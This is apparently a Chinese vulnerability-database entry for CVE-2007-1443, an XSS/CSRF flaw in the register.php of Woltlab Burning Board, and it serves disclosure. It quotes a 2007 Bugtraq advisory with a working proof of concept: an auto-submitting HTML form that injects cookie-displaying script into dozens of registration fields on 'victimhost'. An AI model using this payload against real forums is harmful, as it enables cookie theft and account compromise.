Woltlab Burning Board (wBB)/Burning Board Lite register.php 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191346 漏洞类型 跨站脚本
发布时间 2007-03-13 更新时间 2007-03-13
CVE编号 CVE-2007-1443 CNNVD-ID CNNVD-200703-353
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81900
https://cxsecurity.com/issue/WLB-2007030122
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-353
|漏洞详情
WoltlabBurningBoard(wBB)2.3.6和BurningBoardLite1.0.2pl3e的register.php中存在多个跨站脚本攻击漏洞。远程攻击者可以借助(1)r_username,(2)r_email,(3)r_password,(4)r_confirmpassword,(5)r_homepage,(6)r_icq,(7)r_aim,(8)r_yim,(9)r_msn,(10)r_year,(11)r_month,(12)r_day,(13)r_gender,(14)r_signature,(15)r_usertext,(16)r_invisible,(17)r_usecookies,(18)r_admincanemail,(19)r_emailnotify,(20)r_notificationperpm,(21)r_receivepm,(22)r_emailonpm,(23)r_pmpopup,(24)r_showsignatures,(25)r_showavatars,(26)r_showimages,(27)r_daysprune,(28)r_umaxposts,(29)r_dateformat,(30)r_timeformat,(31)r_startweek,(32)r_timezoneoffset,(33)r_usewysiwyg,(34)r_styleid,(35)r_langid,(36)key_string,(37)key_number,(38)disablesmilies,(39)disablebbcode,(40)disableimages,(41)field[1],(42)field[2]和(43)field[3]参数,注入任意的web脚本或HTML。
|漏洞EXP
On my WBB 2.3.3 (and i think, this is the default setting) you cannot
access register.php when logged in (even as admin). So you need to be
logged off to open the evil site. And when you are logged off, the
cookie is simply useless.

Also, on my Forum, only r_dateformat and r_timeformat are affected.

regards

2007/3/2, SaMuschie <samuschie (at) yahoo (dot) de [email concealed]>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> +--------------------------------------- -  -- -
> | SaMuschie Research Labs proudly presents . . .
> +-------------------------------------------  -- -  -
> | Application: Woltlab Burning Board (wbb)
> | Version: 2.3.6 (others not testet)
> | Vuln./Exploit Type: CSRF/XSS
> | Status: 0day
> +----------------------------------------- --  -  -
> | Discovered by: Samenspender
> | Released: 20070302
> | SaMuschie Release Number: 5
> +------------------------------- -  -- -
>
> CSRF/XSS Exploit:
>
> cat <<EOF > wetpussy.html
> <form name='evilform' method='POST' action='http://victimhost/wbb2/register.php'>
> <input type=hidden name=r_username value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_email value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_password value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_confirmpassword value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=key_string value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=key_number value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_homepage value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_icq value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_aim value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_yim value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_msn value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_day value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_month value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_year value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_gender value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_signature value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=disablesmilies value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=disablebbcode value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=disableimages value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_usertext value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=field%5B1%5D value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=field%5B2%5D value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=field%5B3%5D value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_invisible value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_usecookies value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_admincanemail value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_showemail value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_usercanemail value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_emailnotify value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_notificationperpm value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_receivepm value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_emailonpm value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_pmpopup value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_showsignatures value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_showavatars value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_showimages value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_daysprune value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_umaxposts value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_threadview value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_dateformat value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_timeformat value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_startweek value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_timezoneoffset value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_usewysiwyg value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_styleid value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=r_langid value='"><script>alert("Cookie: " +
> document.cookie)</script><lol="'>
> <input type=hidden name=send value='send'>
> <input type=hidden name=sid value=''>
> <input type=hidden name=disclaimer value='viewed'>
> </form>
> <body onload=javascript:document.forms['evilform'].submit();>
> EOF
>
> +-----------------------------  -- -
> | Lameness Disclaimer
> +------------------------------------- - -- -  -
> | SaMuschie Research Labs was founded to publish
> | vulnerabilities within well known software products,
> | which are easy to discover and exploit.
> |
> | SaMuschie researchers just spend a minimum of time
> | and knowledge for each vulnerability. Hence readers of
> | this advisory are requested not to ask any questions
> | to the researchers.... they don't know the answer ;)
> +----------------------------------  - --  - -
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD
> Qg6at+bMTnvHbw0SYyXk5ko=
> =7wPg
> -----END PGP SIGNATURE-----
>
>
>
>
>
>
> ___________________________________________________________
> Der frhe Vogel fngt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de
>
>
|受影响的产品
Woltlab Burning Board Lite 1.0.2 Pl3e Woltlab Burning Board 2.3.6
|参考资料

来源:BUGTRAQ
名称:20070302Re:WoltlabBurningBoard(wbb)2.3.6CSRF/XSS-0day
链接:http://www.securityfocus.com/archive/1/archive/1/461744/100/100/threaded
来源:BUGTRAQ
名称:20070302WoltlabBurningBoard(wbb)2.3.6CSRF/XSS-0day
链接:http://www.securityfocus.com/archive/1/archive/1/461737/100/100/threaded
来源:VUPEN
名称:ADV-2007-0856
链接:http://www.frsirt.com/english/advisories/2007/0856
来源:SECUNIA
名称:24404
链接:http://secunia.com/advisories/24404
来源:SECUNIA
名称:24386
链接:http://secunia.com/advisories/24386
来源:SREASON
名称:2424
链接:http://securityreason.com/securityalert/2424